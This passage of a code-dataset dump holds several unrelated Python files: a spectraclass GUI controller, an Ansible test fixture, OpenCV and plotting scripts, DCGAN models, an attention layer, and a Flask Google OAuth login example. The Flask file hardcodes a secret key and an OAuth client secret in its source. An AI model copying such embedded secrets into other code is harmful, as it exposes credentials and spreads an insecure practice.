mm().plot_cluster_image( cluster_image )\n ufm().show(f\"Clustering completed\")\n\n def learn(self):\n from spectraclass.learn.manager import ClassificationManager, cm\n ufm().show(\"Learning Classification Mapping... \")\n cm().learn_classification()\n ufm().show( \"Classification Mapping learned\" )\n\n # @log_timing\n # def learn(self):\n # from spectraclass.learn.manager import ClassificationManager, cm\n # from spectraclass.data.base import DataManager, dm\n # from spectraclass.model.labels import LabelsManager, Action, lm\n # ufm().show(\"Learning Classification Mapping... 
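\")\n    #     # NB (assumption): cid 0 serves as \"unlabelled\" here, so labels_mask\n    #     # keeps only hand-marked pixels before fitting; e.g. labels_data of\n    #     # [0, 2, 0, 1] yields filtered_labels [2, 1] plus the two matching\n    #     # rows of the embedding as training features.\n    #     ufm().show(\"Learning Classification Mapping... 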
\")\n # lgm().log(f\" ----> Controller[{self.__class__.__name__}] -> LEARN \")\n # embedding: xa.DataArray = dm().getModelData()\n # labels_data: xa.DataArray = lm().getLabelsArray()\n # labels_mask = (labels_data > 0)\n # filtered_labels: np.ndarray = labels_data.where(labels_mask, drop=True).astype(np.int32).values\n # filtered_point_data: np.ndarray = embedding.where(labels_mask, drop=True).values\n # lgm().log(f\"SHAPES--> embedding: {embedding.shape}, labels_data: {labels_data.shape}, filtered_labels: {filtered_labels.shape}, filtered_point_data: {filtered_point_data.shape}\" )\n # cm().learn_classification( filtered_point_data, filtered_labels )\n # ufm().show( \"Classification Mapping learned\" )\n\n @log_timing\n def propagate_selection(self, niters=1):\n from spectraclass.model.labels import LabelsManager, Action, lm\n from spectraclass.gui.spatial.map import MapManager, mm\n from spectraclass.data.spatial.tile.manager import TileManager, tm\n from spectraclass.data.spatial.tile.tile import Block, Tile\n from spectraclass.graph.manager import ActivationFlow, ActivationFlowManager, afm\n block: Block = tm().getBlock()\n ufm().show(\"Generalizing markers\")\n flow: ActivationFlow = afm().getActivationFlow()\n lm().log_markers(\"pre-spread\")\n self._flow_class_map: np.ndarray = lm().getLabelsArray().data\n catalog_pids = np.arange(0, self._flow_class_map.shape[0])\n lgm().log(f\"SPREAD: flow_class_map shape={self._flow_class_map.shape}, catalog_pids shape={catalog_pids.shape} \")\n converged = flow.spread( self._flow_class_map, niters )\n\n if converged is not None:\n self._flow_class_map = flow.get_classes()\n all_classes = ( lm().current_cid == 0 )\n for cid, label in enumerate( lm().labels ):\n if all_classes or ( lm().current_cid == cid ):\n new_pids: np.ndarray = catalog_pids[ self._flow_class_map == cid ]\n if new_pids.size > 0:\n lgm().log(f\" @@@ spread_selection: cid={cid}, label={label}, #new_indices={len(new_pids)}\" )\n gids: np.ndarray = block.pids2gids( new_pids )\n lm().mark_points( gids, cid, \"labels\" )\n lm().addAction( \"spread\", \"application\", cid=cid )\n mm().plot_labels_image( lm().get_label_map() )\n lm().log_markers(\"post-spread\")\n ufm().show(\"Marker generalization complete\")\n return converged\n\n @exception_handled\n def display_distance(self, niters=100):\n from spectraclass.graph.manager import ActivationFlow, ActivationFlowManager, afm\n from spectraclass.model.labels import LabelsManager, Action, lm\n from spectraclass.gui.pointcloud import PointCloudManager, pcm\n ufm().show(\"Coloring by Distance\")\n lgm().log(f\" ----> Controller[{self.__class__.__name__}] -> DISTANCE \")\n seed_points: xa.DataArray = lm().getSeedPointMask()\n flow: ActivationFlow = afm().getActivationFlow()\n if flow.spread( seed_points.data, niters, bidirectional=True ) is not None:\n pcm().color_by_value( flow.get_distances(), distance=True )\n ufm().show(\"Done Coloring by Distance\")\n\n @exception_handled\n def add_marker(self, marker: Marker):\n from spectraclass.model.labels import LabelsManager, Action, lm\n from spectraclass.gui.lineplots.manager import GraphPlotManager, gpm\n from spectraclass.gui.pointcloud import PointCloudManager, pcm\n if marker is not None:\n lgm().log( f\" #APP-> Add Marker[{marker.cid}] \")\n lm().addMarker( marker )\n gpm().plot_graph( marker )\n pcm().addMarker(marker)\n\n @exception_handled\n def remove_marker(self, marker: Marker):\n from spectraclass.model.labels import LabelsManager, Action, lm\n from 
spectraclass.gui.lineplots.manager import GraphPlotManager, gpm\n from spectraclass.gui.pointcloud import PointCloudManager, pcm\n if marker is not None:\n lm().clearMarker( marker )\n gpm().remove_marker( marker )\n pcm().deleteMarkers(marker.gids.tolist())\n\n def get_marked_pids(self) -> Dict[int,Set[int]]:\n from spectraclass.model.labels import LabelsManager, Action, lm\n marked_pids = {}\n for marker in lm().markers:\n new_pids = marker.gids[ np.where(marker.gids >= 0)].tolist()\n current_pids = marked_pids.get( marker.cid, set() )\n marked_pids[ marker.cid ] = current_pids.union( set(new_pids) )\n return marked_pids\n\n @exception_handled\n def color_pointcloud( self, color_data: np.ndarray = None, **kwargs ):\n from spectraclass.gui.pointcloud import PointCloudManager, pcm\n pcm().color_by_value( color_data, **kwargs )\n\n\ndef app() -> SpectraclassController:\n from spectraclass.data.base import DataManager, dm\n rv = dm().app()\n return rv\n\n\n\n\n\n\n\n\n","repo_name":"nasa-nccs-cds/spectraclass","sub_path":"spectraclass/application/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":11248,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"} +{"seq_id":"19837721649","text":"from __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\nimport json\n\nimport pytest\n\nfrom ansible.module_utils import basic\nfrom ansible.module_utils._text import to_bytes\n\n\nclass AnsibleRunEnd(Exception):\n \"\"\" Termination signal \"\"\"\n\n\nclass AnsibleRun:\n def __init__(self):\n self.success = None\n self.result = None\n\n def run(self, module, **args):\n a = dict(\n _ansible_remote_tmp=\"/tmp\",\n _ansible_keep_remote_files=False,\n )\n a.update(args)\n basic._ANSIBLE_ARGS = to_bytes(json.dumps(dict(ANSIBLE_MODULE_ARGS=a)))\n try:\n module.main()\n except AnsibleRunEnd:\n # This is what we expect\n return\n assert False, \"Module is not calling exit_json or fail_json.\"\n\n def exit_json(self, **result):\n self.success = True\n self.result = result\n raise AnsibleRunEnd()\n\n def fail_json(self, **result):\n self.success = False\n self.result = result\n self.result[\"changed\"] = result.get(\"changed\", False)\n raise AnsibleRunEnd()\n\n\n@pytest.fixture\ndef ansible_run(mocker):\n ansible_run = AnsibleRun()\n mocker.patch.multiple(\n basic.AnsibleModule,\n exit_json=ansible_run.exit_json,\n fail_json=ansible_run.fail_json,\n )\n return ansible_run\n","repo_name":"xlab-steampunk/steampunk.unit","sub_path":"tests/unit/modules/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"4836481894","text":"import cv2\r\n\r\n# VideoCapture() is a function in cv2 library to read video, in\r\n# argument section we write path of image where video is present\r\n\r\ncap = cv2.VideoCapture(\"Resources/video.mp4\")\r\n\r\n# video is a series of images so while loop\r\nwhile True:\r\n success, img = cap.read()\r\n cv2.imshow(\"Video\",img)\r\n# wait for delay and looks for 'q' to break the loop\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n","repo_name":"Shyam9899/Virtual-Paint-Using-OpenCV","sub_path":"Reading_Video.py","file_name":"Reading_Video.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"247078269","text":"# --- Imports ---\nimport logging\nimport 
random\nimport json\nimport os\nimport concurrent.futures as cf\nimport itertools\nimport io\nimport requests\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.util.retry import Retry\n\nimport numpy as np\nimport pandas as pd\nimport geopandas as gpd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\n\nimport vapor.config as config\n\nlog = logging.getLogger(\"vapor\")\n\nnrel_color_dict = ['#0077C8', #darkblue\n '#00A9E0', #lightblue\n '#658D1B', #darkgreen\n '#84BD00', #lightgreen\n '#FFC72C', #yellow\n '#DE7C00', #orange\n '#5B6770', #darkgray\n '#C1C6C8'] #lightgray\n\ntech_dict = {'pv':nrel_color_dict[4],\n 'wind':nrel_color_dict[1],\n 'batt':nrel_color_dict[3]}\n\nbatt_size_dict = {0:'o', 25:'P', 100:'^'}\n\nscen_label_dict = {\n 'StdScen20_LowRECost':'Low Cost',\n 'StdScen20_MidCase':'Mid Cost',\n 'StdScen20_HighRECost':'High Cost'}\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# ~~~~~~~~~~~~~~~~~~ VISUALIZATION OF OUTPUT ~~~~~~~~~~~~~~~~~~~~~\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nclass Visualizer():\n def __init__(self, results, aggregate_region,\n legend=True,\n last_year=config.LAST_YEAR,\n region_label_pct=0.4):\n \n assert isinstance(legend, bool)\n assert isinstance(results, pd.DataFrame)\n \n self.legend = legend\n self.last_year = last_year\n self.region_label_pct = region_label_pct #put labels on geographys larger than this percentile size. 0 for no labels.\n \n # --- Merge on geometry to data ---\n geo = gpd.read_file(os.path.join('data','geography','ReEDS_Resource_Regions.shp'))\n geo = geo[[aggregate_region, 'geometry']]\n geo.rename({aggregate_region:'region'}, inplace=True, axis='columns')\n geo = geo.dissolve(by='region')\n\n self.gdf = geo.merge(results, on='region', how='inner')\n\n self.cbarloc = [0.2, 0.2, 0.2, 0.05] #location for legend color bar\n self.colorscheme = 'Reds' #matplotlib colorscheme\n self.units = None\n \n def _update_crs(self, crs=2163):\n \"\"\"Update the CRS to US National Atlas Standard (non-meractor).\"\"\"\n self.gdf= self.gdf.to_crs(f'epsg:{crs}')\n \n def _update_units(self, column, round_at=0):\n \"\"\"Update units for the selected column.\"\"\"\n \n unit_df = self.gdf.copy()\n\n MW_size = unit_df['system_capacity'] / 1000\n\n if column in ['cambium_co2_rate_marg', 'cambium_co2_rate_avg', 'cambium_co2_rate_lrmer', 'lifetime_cambium_co2_rate_marginal', 'lifetime_cambium_co2_rate_avg', 'lifetime_cambium_co2_rate_lrmer']:\n self.units = 'Mil Tons'\n unit_df[column] = unit_df[column] / 1000000 #convert from kg/W to MT/MW # IS THIS CORRECT? 
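(unit check, unverified: if the\n            # column really is kg, then kg -> t is /1e3 and t -> million t is a\n            # further /1e6, i.e. /1e9 in total; /1e6 as written yields thousands\n            # of tons, while a /W -> /MW denominator change would be *1e6.)\n            # 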
TODO: check this!\n self.suffix = 'Savings'\n \n elif column in ['lcoe_real','lcoe_nom', 'lppa_nom', 'lppa_real','ppa']:\n self.units = '$/MWh'\n unit_df[column] = unit_df[column] * 10 #convert from Cents/kWh to $/MWh\n self.colorscheme = self.colorscheme + '_r' #reverse colormap\n self.suffix = 'Price'\n \n elif column in ['cambium_enduse_energy_value','cambium_busbar_energy_value','cambium_grid_value',\n 'cambium_capacity_value','cambium_as_value','cambium_portfolio_revenue']:\n self.units = '$/MW/yr'\n unit_df[column] = unit_df[column] / MW_size #TODO: check units\n self.suffix = 'Savings'\n\n elif column in ['project_return_aftertax_irr']:\n self.units = '%'\n self.suffix = ''\n\n elif column in ['project_return_aftertax_npv', 'lifetime_cambium_grid_value']:\n unit_df[column] = unit_df[column] / 1000000\n self.units = '$ Mil'\n self.suffix = ''\n\n elif column in ['marginal_cost_mwh']:\n self.units = '$/MWh'\n self.suffix = ''\n \n else:\n self.units = ''\n self.suffix = ''\n \n # --- Round ---\n unit_df[column] = unit_df[column].round(round_at)\n return unit_df\n \n \n def merged_choropleth(self, column, scenario, batt_size=0, ascending=False, storage=True, reverse_cmap=False, title=None, *kwargs):\n\n # --- Update crs ---\n self._update_crs()\n \n # --- Update units ---\n plot_df = self._update_units(column)\n\n # --- subset scenario ---\n assert scenario in plot_df['scenario'].unique()\n plot_df = plot_df.loc[(plot_df['scenario'] == scenario) & (plot_df['batt_size'] == batt_size)]\n\n # --- pick best tech for each geo ---\n plot_df.sort_values(column, ascending=ascending, inplace=True)\n plot_df.drop_duplicates(subset=['region'], keep='first', inplace=True)\n \n # --- Clean up column string ---\n clean_column = column.replace('_',' ').title()\n clean_column = f\"{clean_column} {self.suffix}\"\n \n fig, ax = plt.subplots(dpi=200)\n\n for tech in plot_df['tech'].unique():\n\n tech_df = plot_df.loc[plot_df['tech'] == tech]\n \n if tech == 'pv':\n cmap = 'Oranges'\n elif tech == 'wind':\n cmap = 'Blues'\n\n if reverse_cmap:\n cmap = cmap + '_r'\n \n tech_df.plot(column, edgecolor='k', cmap=cmap, alpha=0.8, linewidth=0.2, ax=ax)\n \n # if self.legend:\n # vmax = max(tech_df[column])\n # vmed = round(tech_df[column].mean(),0)\n # vmin = min(tech_df[column])\n \n # fig = ax.get_figure()\n # cax = fig.add_axes(self.cbarloc) #set size and location of cbar\n \n # # --- Create array of values for color bar ---\n # sm = plt.cm.ScalarMappable(cmap=cmap, norm=plt.Normalize(vmin=vmin, vmax=vmax))\n # sm._A = []\n # cbar = fig.colorbar(sm, cax=cax, alpha = 0.8, orientation='horizontal', ticks = [vmin,vmed,vmax])\n # cbar.ax.set_xticklabels([f\"{int(vmin):,}\", f\"{int(vmed):,}\\n{self.units}\", f\"{int(vmax):,}\"])\n \n if self.region_label_pct > 0:\n \n tech_df['area_pct'] = tech_df.area.rank(pct=True)\n \n for _, row in tech_df.iterrows():\n if row['area_pct'] > self.region_label_pct:\n ax.annotate(s=f\"{round(row[column], 1):,}\",\n xy=row['geometry'].centroid.coords[0],\n horizontalalignment='center',\n size=7)\n \n ax.axis('off')\n \n if title == None:\n ax.set_title(f\"{clean_column} ({self.units}) through {self.last_year}\")\n else:\n ax.set_title(title)\n \n def choropleth(self, column, scenario, tech, batt_size=0, ascending=False, storage=True, reverse_cmap=False, title=None, *kwargs):\n\n # --- Update crs ---\n self._update_crs()\n \n # --- Update units ---\n plot_df = self._update_units(column)\n\n # --- subset scenario ---\n assert scenario in plot_df['scenario'].unique()\n plot_df = 
plot_df.loc[(plot_df['scenario'] == scenario) & (plot_df['batt_size'] == batt_size) & (plot_df['tech'] == tech)]\n\n # --- pick best tech for each geo ---\n plot_df.sort_values(column, ascending=ascending, inplace=True)\n plot_df.drop_duplicates(subset=['region'], keep='first', inplace=True)\n \n # --- Clean up column string ---\n clean_column = column.replace('_',' ').title()\n clean_column = f\"{clean_column} {self.suffix}\"\n \n fig, ax = plt.subplots(dpi=200)\n \n if tech == 'pv':\n cmap = 'Oranges'\n elif tech == 'wind':\n cmap = 'Blues'\n\n if reverse_cmap:\n cmap = cmap + '_r'\n \n plot_df.plot(column, edgecolor='k', cmap=cmap, alpha=0.8, linewidth=0.2, ax=ax, scheme='Percentiles')\n \n if self.region_label_pct > 0:\n \n plot_df['area_pct'] = plot_df.area.rank(pct=True)\n \n for _, row in plot_df.iterrows():\n if row['area_pct'] > self.region_label_pct:\n ax.annotate(text=f\"{int(round(row[column], 0)):,}\",\n xy=row['geometry'].centroid.coords[0],\n horizontalalignment='center',\n size=7)\n \n ax.axis('off')\n \n if title != None:\n ax.set_title(title)\n\n def triple_choropleth(self, column, tech, batt_size=0, ascending=False, storage=True, reverse_cmap=False, title=None, *kwargs):\n\n # --- Update crs ---\n self._update_crs()\n \n # --- Update units ---\n plot_df = self._update_units(column)\n\n # --- subset scenario ---\n plot_df = plot_df.loc[(plot_df['batt_size'] == batt_size)]\n cutoffs = plot_df[column].quantile(list(np.arange(0,1,0.2))).to_list()\n classification_kwds = dict(bins=cutoffs)\n plot_df = plot_df.loc[(plot_df['tech'] == tech)]\n\n # --- Clean up column string ---\n clean_column = column.replace('_', ' ').title()\n clean_column = f\"{clean_column} {self.suffix}\"\n\n if tech == 'pv':\n cmap = 'Oranges'\n elif tech == 'wind':\n cmap = 'Blues'\n if reverse_cmap:\n cmap = cmap + '_r'\n\n fig, axs = plt.subplots(figsize=(8,4), dpi=400, ncols=3)\n\n for i, s in enumerate(['StdScen20_LowRECost', 'StdScen20_MidCase', 'StdScen20_HighRECost']):\n scenario_df = plot_df.loc[plot_df['scenario'] == s]\n\n # --- pick best tech for each geo ---\n scenario_df.sort_values(column, ascending=ascending, inplace=True)\n scenario_df.drop_duplicates(subset=['region'], keep='first', inplace=True)\n scenario_df.plot(column, edgecolor='k', cmap=cmap, alpha=0.8, linewidth=0.2, ax=axs[i],\n scheme='UserDefined', classification_kwds=classification_kwds)\n \n if self.region_label_pct > 0:\n \n scenario_df['area_pct'] = scenario_df.area.rank(pct=True)\n \n for _, row in scenario_df.iterrows():\n if row['area_pct'] > self.region_label_pct:\n axs[i].annotate(text=f\"{int(round(row[column], 0)):,}\",\n xy=row['geometry'].centroid.coords[0],\n horizontalalignment='center',\n size=7)\n \n axs[i].axis('off')\n axs[i].set_title(scen_label_dict[s], fontsize=10)\n plt.tight_layout()\n\n\n def supply_curve(self, column, scenario, label='Marginal Price\\n($/MWh)', batt_sizes=None, ascending=True, legend=True):\n\n # --- Update units ---\n plot_df = self._update_units(column)\n\n # --- subset scenario ---\n no_batt = plot_df.loc[(plot_df['scenario'] == scenario) & (plot_df['batt_size'] == 0)]\n\n # --- drop duplicate techs for same state ---\n no_batt.sort_values(column, ascending=ascending, inplace=True)\n no_batt.drop_duplicates(subset=['region', 'scenario'], inplace=True, keep='first')\n\n # --- mock up widths and bar positions and color ---\n width = [i for i in no_batt['system_capacity']]\n\n relative_positions = []\n relative_position = 0\n previous_width = 0\n for w in width:\n relative_position = 
float(relative_position + (previous_width/2) + (w/2))\n previous_width = w\n relative_positions.append(relative_position)\n \n colors = no_batt['tech'].map(tech_dict)\n \n fig, ax = plt.subplots(figsize=(8,2), dpi=400)\n ax.bar(relative_positions, no_batt[column],\n width=width, linewidth=0.0,\n color=colors)\n \n # --- mock up label positions ---\n odd = -1\n for i, l in enumerate(no_batt['region']):\n x = relative_positions[i]\n y_max = list(no_batt[column])[i]\n y = y_max / 2 + (odd * y_max * 0.075)\n ax.annotate(l, xy=(x,y), ha='center',va='bottom',\n fontsize=6)\n odd *= -1\n\n # --- plot battery bars ---\n if batt_sizes != None:\n for batt_size in batt_sizes:\n batt = plot_df.loc[(plot_df['scenario'] == scenario) & (plot_df['batt_size'] == batt_size)]\n batt.sort_values(column, ascending=ascending, inplace=True)\n batt.drop_duplicates(subset=['region', 'scenario'], inplace=True, keep='first')\n\n ax.bar(relative_positions, batt[column],\n width=width, linewidth=0.0,\n color=nrel_color_dict[3], alpha=0.5, zorder=0)\n\n # --- clean up ---\n plt.title(f'{scen_label_dict[scenario]}', fontsize=10)\n plt.subplots_adjust(hspace=0.5)\n plt.ylabel(label)\n plt.xlabel('')#Cumulative RE Capacity')\n # plt.ylim(-5, 70)\n plt.tight_layout()\n\n if legend:\n label_dict = {'pv':'Solar PV', 'wind':'Wind', 'batt':'w/ 4 hr Battery'}\n custom_patches = [mpatches.Patch(color=v, label=label_dict[k]) for k,v in tech_dict.items()]\n plt.legend(handles=custom_patches, bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n\n sns.despine(fig)\n\n \n def scatter_facet(self, xcol, ycol, legend=False):\n \n # --- Update units ---\n plot_df = self.gdf.copy()\n \n sns.set_style()\n fig, axs = plt.subplots(figsize=(10,6), nrows=2, ncols=3, sharey=True, dpi=400)\n\n\n for i_scenario, s in enumerate(['StdScen20_LowRECost', 'StdScen20_MidCase', 'StdScen20_HighRECost']):\n for i_tech, tech in enumerate(['pv','wind']):\n for b in set(plot_df['batt_size']):\n scenario_df = plot_df.loc[(plot_df['scenario'] == s) & (plot_df['batt_size'] == b) & (plot_df['tech'] == tech)]\n\n colors = scenario_df['tech'].map(tech_dict)\n label = f\"{tech.capitalize()} - {int(b)} MW Batt\"\n axs[i_tech][i_scenario].scatter(\n x=scenario_df[xcol],\n y=scenario_df[ycol],\n s=80,\n # s=scenario_df[zcol] * 2,\n c=colors, marker=batt_size_dict[b],\n alpha=0.3, edgecolor=\"k\", linewidth=0.5,\n label=label)\n\n poly = np.poly1d(np.polyfit(scenario_df[xcol], scenario_df[ycol], 2))\n x_min = scenario_df[xcol].min() * 0.9\n x_max = scenario_df[xcol].max() * 1.1\n x_range = np.linspace(x_min, x_max, 50)\n axs[i_tech][i_scenario].plot(\n x_range, poly(x_range),\n c=tech_dict[tech], linewidth=3, alpha=0.8)\n\n if i_scenario == 0:\n axs[i_tech][i_scenario].set_ylabel('Lifetime Cumulative \\n Grid Value')\n\n if i_tech == 1:\n axs[i_tech][i_scenario].set_xlabel('Marginal Cost ($/MWh)')\n \n if i_tech ==0:\n axs[i_tech][i_scenario].set_title(scen_label_dict[s])\n axs[i_tech][i_scenario].get_xaxis().set_visible(False)\n\n axs[i_tech][i_scenario].set_xlim(0, 100)\n axs[i_tech][i_scenario].set_ylim(0.4*1e8, 1.8*1e8)\n \n if legend:\n solar_handles, solar_labels = axs[i_tech-1][i_scenario].get_legend_handles_labels()\n wind_handles, wind_labels = axs[i_tech][i_scenario].get_legend_handles_labels()\n fig.legend(solar_handles+wind_handles, solar_labels+wind_labels, bbox_to_anchor=(1.2, 1))\n\n sns.despine()\n 
plt.tight_layout()\n\n","repo_name":"NREL/vapor","sub_path":"vapor/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":16417,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"7"} +{"seq_id":"22672537796","text":"import torch\nimport torch.nn as nn\n\n# code from https://github.com/pytorch/examples/blob/main/dcgan/main.py\n\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n torch.nn.init.normal_(m.weight, 0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n torch.nn.init.normal_(m.weight, 1.0, 0.02)\n torch.nn.init.zeros_(m.bias)\n\n# only training on one gpu\n# ngf = number of filters in the generator\n# nz = size of the latent z vector\n# nc = number of channels\nclass Generator(nn.Module):\n def __init__(self, ngf: int, nc: int, nz: int):\n super(Generator, self).__init__()\n self.main = nn.Sequential(\n # input is Z, going into a convolution\n nn.ConvTranspose2d(nz, ngf * 8, 4, 1, 0, bias=False),\n nn.BatchNorm2d(ngf * 8),\n nn.ReLU(True),\n # state size. (ngf*8) x 4 x 4\n nn.ConvTranspose2d(ngf * 8, ngf * 4, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf * 4),\n nn.ReLU(True),\n # state size. (ngf*4) x 8 x 8\n nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf * 2),\n nn.ReLU(True),\n # state size. (ngf*2) x 16 x 16\n nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf),\n nn.ReLU(True),\n # state size. (ngf) x 32 x 32\n nn.ConvTranspose2d(ngf, nc, 4, 2, 1, bias=False),\n nn.Tanh()\n # state size. (nc) x 64 x 64\n )\n\n def forward(self, input):\n output = self.main(input)\n return output\n\n# ndf = number of filters in the discriminator\n# nc = number of channels\nclass Discriminator(nn.Module):\n def __init__(self, ndf, nc):\n super(Discriminator, self).__init__()\n self.main = nn.Sequential(\n # input is (nc) x 64 x 64\n nn.Conv2d(nc, ndf, 4, 2, 1, bias=False),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf) x 32 x 32\n nn.Conv2d(ndf, ndf * 2, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 2),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*2) x 16 x 16\n nn.Conv2d(ndf * 2, ndf * 4, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 4),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*4) x 8 x 8\n nn.Conv2d(ndf * 4, ndf * 8, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 8),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*8) x 4 x 4\n nn.Conv2d(ndf * 8, 1, 4, 1, 0, bias=False),\n nn.Sigmoid()\n )\n\n def forward(self, input):\n output = self.main(input)\n return output.view(-1, 1).squeeze(1)\n\n","repo_name":"eth-easl/orion","sub_path":"related/baselines/dcgan/dcgan.py","file_name":"dcgan.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"7"} +{"seq_id":"17141365180","text":"import torch\nimport math\n\nfrom vistem.modeling.layers import Conv2d, unfold_2d, fold_2d\nfrom . 
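import PLANDecode\n\n# Hedged summary of the attention step in PLANBottomUp.forward below (assuming\n# plan_cfg decodes erf == 3, i.e. 9 unfolded positions per top-level cell):\n#\n#     weight = softmax_over_positions( sum_c(K_top * Q_bot) / sqrt(key_dim) )\n#     out    = sum_over_positions( weight * V_bot )\n#\n# which is scaled dot-product attention with the 3x3 spatial neighbourhood\n# playing the role of the sequence axis.\nfrom . 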
import PLANDecode\n\n__all__ = ['PLANBottomUp']\n\nclass PLANBottomUp(PLANDecode):\n def __init__(self, top_feat, bot_feat, in_channels, plan_cfg):\n super().__init__()\n self.decode_cfg(plan_cfg)\n self.out_channels = in_channels\n\n self.top_key = Conv2d(in_channels, self.num_heads * self.key_dim, 1, stride=1, bias=False)\n self.bot_query = Conv2d(in_channels, self.num_heads * self.key_dim, 1, stride=1, bias=False)\n self.bot_value = Conv2d(in_channels, self.num_heads * self.value_dim, 1, stride=1, bias=False)\n \n self.top_fuse = Conv2d(self.num_heads * self.value_dim, self.out_channels, 1, stride=1, bias=False)\n\n for layer in self.modules():\n if isinstance(layer, Conv2d):\n torch.nn.init.normal_(layer.weight, mean=0, std=0.01)\n if layer.bias is not None : torch.nn.init.constant_(layer.bias, 0)\n\n def forward(self, x):\n top_feat, bot_feat = x\n top_key = self.top_key(top_feat).split(self.key_dim, dim=1)\n bot_query = self.bot_query(bot_feat).split(self.key_dim, dim=1)\n bot_value = self.bot_value(bot_feat).split(self.value_dim, dim=1)\n\n top_results = []\n for head_idx in range(self.num_heads):\n bot_Q = unfold_2d(bot_query[head_idx], kernel_size=self.erf, padding=(self.erf-1)//2, stride=2) # (B, 9, C, H, W)\n bot_V = unfold_2d(bot_value[head_idx], kernel_size=self.erf, padding=(self.erf-1)//2, stride=2) # (B, 9, C, H, W)\n top_K = top_key[head_idx] # (B, C, H, W)\n\n top_weight = (top_K.unsqueeze(dim=1) * bot_Q).sum(dim=2) / math.sqrt(self.key_dim)\n top_weight = top_weight.softmax(dim=1) # (B, 9, H, W)\n\n top_out = (top_weight.unsqueeze(dim=2) * bot_V) # (B, 9, C, H, W)\n top_out = torch.sum(top_out, dim=1)\n top_results.append(top_out)\n\n top_results = torch.cat(top_results, dim=1)\n top_results = self.top_fuse(top_results)\n\n return top_results","repo_name":"major196512/vistem","sub_path":"vistem/modeling/backbone/plan/inter_layer/bottom_up.py","file_name":"bottom_up.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"29960966273","text":"import json\n\nfrom flask import Flask, url_for, redirect, session, jsonify\n\nfrom flask_login import (UserMixin, login_required, login_user, logout_user,\n current_user)\nfrom flask_googlelogin import GoogleLogin\n\n\nusers = {}\n\n\napp = Flask(__name__)\napp.config.update(\n SECRET_KEY='Miengous3Xie5meiyae6iu6mohsaiRae',\n GOOGLE_LOGIN_CLIENT_ID='204903060412.apps.googleusercontent.com',\n GOOGLE_LOGIN_CLIENT_SECRET='9LQdzxkGfM2BTM10dz49uWLI',\n GOOGLE_LOGIN_REDIRECT_URI='http://localhost:5000/oauth2callback')\ngooglelogin = GoogleLogin(app)\n\n\nclass User(UserMixin):\n def __init__(self, userinfo):\n self.id = userinfo['id']\n self.name = userinfo['name']\n self.picture = userinfo.get('picture')\n\n\n@googlelogin.user_loader\ndef get_user(userid):\n return users.get(userid)\n\n\n@app.route('/')\ndef index():\n return \"\"\"\n
<p><a href=\"%s\">Login</a></p>
\n \"\"\" % (\n googlelogin.login_url(approval_prompt='force', access_type='offline'),\n )\n\n\n@app.route('/profile')\n@login_required\ndef profile():\n return \"\"\"\n
<p>Hello, %s</p>\n    <p><img src=\"%s\" width=\"100\" height=\"100\"></p>\n    <p>Token: %r</p>\n    <p><a href=\"/get_access_token\">Get new access token</a></p>\n    <p><a href=\"/logout\">Logout</a></p>
\n \"\"\" % (current_user.name, current_user.picture, session.get('token'))\n\n\n@app.route('/oauth2callback')\n@googlelogin.oauth2callback\ndef login(token, userinfo, **params):\n user = users[userinfo['id']] = User(userinfo)\n login_user(user)\n session['token'] = json.dumps(token)\n return redirect(params.get('next', url_for('.profile')))\n\n\n@app.route('/get_access_token')\n@login_required\ndef get_access_token():\n refresh_token = json.loads(session['token'])['refresh_token']\n return jsonify(googlelogin.get_access_token(refresh_token))\n\n\n@app.route('/logout')\ndef logout():\n logout_user()\n session.clear()\n return \"\"\"\n
<p>Logged out</p>\n    <p><a href=\"/\">Return to /</a></p>
